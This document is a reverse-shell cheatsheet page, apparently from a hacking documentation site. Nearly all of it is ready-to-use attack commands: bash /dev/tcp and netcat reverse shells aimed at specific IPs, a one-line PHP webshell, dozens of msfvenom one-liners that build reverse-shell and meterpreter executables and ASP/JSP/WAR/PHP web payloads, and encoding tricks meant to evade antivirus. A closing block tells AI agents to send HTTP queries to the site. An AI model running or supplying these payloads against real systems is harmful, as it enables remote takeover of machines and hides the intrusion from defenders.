# Reverse-shell-cheatsheet ## Great resource for reverse shell creation in all possible languages: {% embed url="" %} ## Linux ```bash bash -i >& /dev/tcp/172.25.167.7/8000 0>&1 ``` ```bash cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.9 4578 > /tmp/f ``` ## PHP ```php #Webshell system($_GET[0]); #Reverse Shell exec("/bin/bash -c 'bash -i >& /dev/tcp/PWNIP/PWNPO 0>&1'"); ``` ## Msfvenom * Create a simple reverse tcp shell executable ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell.exe ``` ### Non-Meterpreter Reverse Shells * **Stageless** Payloads for Windows (Works with netcat)


x86	`msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe`
x64	`msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe`

**Stageless** Payloads for Linux (Works with netcat)


x86	`msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf`
x64	`msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf`

**Staged** Payloads for Windows


x86	`msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe`
x64	`msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe`

**Staged** Payloads for Linux


x86	`msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf`
x64	`msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf`

*** ### Non-Meterpreter Web Payloads


asp	`msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp`
jsp	`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp`
war	`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war`
php	`msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php`

*** ### Meterpreter Binaries **Staged** Payloads for Windows


x86	`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe`
x64	`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe`

**Staged** Payloads for Linux


x86	`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf`
x64	`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf`

**Stageless** Payloads for Linux


x86	`msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf`
x64	`msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf`

**Stageless** Payloads for Windows


x86	`msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe`
x64	`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe`

*** ### Meterpreter Web Payloads


asp	`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp`
jsp	`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp`
war	`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war`
php	`msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php`

*** ### Payload Encryption and Customization #### Payload Encryption To obfuscate the payload and evade (some) antivirus detection, you can use payload encryption. **Example: Encrypting a payload** ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe --encrypt xor --encrypt-key > encrypted_shell.exe ``` Replace with a custom key for XOR encryption. #### Payload Customization Use various obfuscation techniques to make your payload less detectable by security tools. **Example - Obfuscating a payload with Shikata Ga Nai** ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -e x86/shikata_ga_nai > obfuscated_shell.exe ``` Consider adjusting payload properties to fit specific scenarios. For example, changing the sleep time to delay beacon intervals. **Example -Modifying sleep time for a Windows reverse shell** ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe --platform windows --arch x86 --smallest --encrypt xor --encrypt-key --sleep 10 > custom_shell.exe ``` Replace `` with a custom key and adjust the sleep time as needed. #### Credits: {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.hackjiji.org/general/reverse-shell-cheatsheet.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.